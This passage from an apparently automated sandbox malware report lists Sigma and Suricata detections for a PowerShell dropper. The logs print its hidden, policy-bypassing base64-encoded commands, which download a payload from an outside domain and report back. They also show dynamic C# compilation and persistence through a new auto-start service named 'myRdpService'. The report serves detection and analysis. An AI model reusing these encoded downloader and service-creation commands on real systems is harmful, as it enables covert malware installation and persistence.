AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB

Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module

Source: Event Logs

Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro: Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1151 Host ID = 7c34b11a-dd38-4e83-bc1c-56ca8e9b96f9 Host Application = powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= Engine Version = 5.1.19041.1151 Runspace ID = 28b82a9c-9682-4531-a4e1-809c4e307f7d Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = computer\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.Windows.Forms", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1151 Host ID = 7c34b11a-dd38-4e83-bc1c-56ca8e9b96f9 Host Application = powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= Engine Version = 5.1.19041.1151 Runspace ID = 28b82a9c-9682-4531-a4e1-809c4e307f7d Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = computer\user Connected User = Shell ID = Microsoft.PowerShell, data1: , data2: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.Windows.Forms"

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6676, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ProcessId: 6220, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", ProcessId: 3620, ProcessName: powershell.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3620, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline", ProcessId: 6124, ProcessName: csc.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Temp\myRdpService.exe cakoi7, ParentImage: C:\Windows\Temp\myRdpService.exe, ParentProcessId: 5496, ParentProcessName: myRdpService.exe, ProcessCommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ProcessId: 6676, ProcessName: cmd.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3620, TargetFilename: C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1368, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 8060, ProcessName: net.exe

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1368, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , ProcessId: 7920, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", ProcessId: 3620, ProcessName: powershell.exe

Sigma detected: SC.EXE Query Execution

Source: Process started

Author: frack113: Data: Command: sc query myRdpService, CommandLine: sc query myRdpService, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc query myRdpService, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9840, ParentProcessName: cmd.exe, ProcessCommandLine: sc query myRdpService, ProcessId: 9928, ProcessName: sc.exe

Sigma detected: Start Windows Service Via Net.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1368, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 8060, ProcessName: net.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3620, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline", ProcessId: 6124, ProcessName: csc.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-29T09:10:27.776392+0100	2803305	3	Unknown Traffic	192.168.11.30	49761	172.67.179.67	443	TCP
2024-11-29T09:11:30.992987+0100	2803305	3	Unknown Traffic	192.168.11.30	49766	172.67.179.67	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-29T09:09:01.270765+0100	2803274	2	Potentially Bad Traffic	192.168.11.30	49737	172.67.179.67	443	TCP
